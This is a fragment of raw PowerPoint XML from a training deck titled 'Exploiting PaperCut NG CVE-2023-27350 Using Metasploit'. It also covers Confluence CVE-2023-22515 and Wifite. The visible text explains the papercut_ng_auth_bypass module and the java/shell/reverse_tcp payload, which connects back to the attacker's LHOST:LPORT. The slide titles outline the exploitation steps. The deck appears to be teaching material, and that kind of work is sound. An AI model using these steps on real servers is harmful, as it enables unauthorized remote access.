              <a:t>papercut_ng_auth_bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400"/>
              <a:t>), you need to choose a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400"/>
              <a:t>—the piece of code that runs on the target once exploitation is successful.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="1"/>
              <a:t>What is java/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="1" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1400"/>
              <a:t>java/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400"/>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="1"/>
              <a:t>reverse shell payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400"/>
              <a:t> written in Java. When executed on the target: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400"/>
              <a:t>It creates a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="1"/>
              <a:t>command shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400"/>
              <a:t>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400"/>
              <a:t>The shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="1"/>
              <a:t>connects back (reverse)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400"/>
              <a:t> to the attacker’s machine (LHOST:LPORT).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1400"/>
              <a:t>The attacker gets command-line access to the victim system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Snake">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4355CF33-0E7A-5DEA-E57C-C803134B6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23273" y="909637"/>
            <a:ext cx="2387826" cy="23878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9C47BD-EA39-E28C-017D-1B3FFBDA2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811" y="5098056"/>
            <a:ext cx="5622189" cy="1044725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B152A91-2920-4848-A8BC-B15DA324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934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6FEC0-665C-1FC5-DEB6-3870BE266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b="1"/>
              <a:t> Configure Exploit Options</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1"/>
            </a:b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F4C1B20-C55D-6395-7A9A-0411336D5A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8894453"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="700635" y="2221992"/>
          <a:ext cx="10691265" cy="3739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3147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7EF24-B5FB-FC2C-5033-1BA52CF1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3F642-2F63-3081-FB43-3FC5E097E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A2DEA4-A908-E120-06D7-4FB464552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49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AACFC-738A-3C14-F624-206ACA05B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001512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b="1"/>
              <a:t> Launch the Exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1"/>
            </a:br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Unlock">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5E4F705-3A08-59A9-0E09-0D7A4DB85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4560" y="1951854"/>
            <a:ext cx="4202057" cy="4202057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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9921241F-569A-4BEB-CE14-640FCC6339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6320182"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="704088" y="2231136"/>
          <a:ext cx="6001512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91810199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1197</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>126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ACADEMY ENGRAVED LET PLAIN:1.0</vt:lpstr>
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calisto MT</vt:lpstr>
      <vt:lpstr>Univers Condensed</vt:lpstr>
      <vt:lpstr>ChronicleVTI</vt:lpstr>
      <vt:lpstr>Exploiting PaperCut NG CVE-2023-27350 Using Metasploit </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Open Metasploit Framework </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Load the Exploit Module </vt:lpstr>
      <vt:lpstr>Set  the Payload </vt:lpstr>
      <vt:lpstr> Configure Exploit Options </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> Launch the Exploit </vt:lpstr>
      <vt:lpstr>Post-Exploitation </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploit Atlassian Confluence 8.3.3  CVE-2023-22515 </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Open Metasploit Framework </vt:lpstr>
      <vt:lpstr>Load the Exploit Module </vt:lpstr>
      <vt:lpstr>4. Configure the Target &amp; Listener </vt:lpstr>
      <vt:lpstr> Launch the Exploit </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Wifite Tool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nagendher konda</dc:creator>
  <cp:lastModifiedBy>nagendher konda</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-23T16:12:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-24T16:00:39Z</dcterms:modified>
</cp:coreProperties>
</file>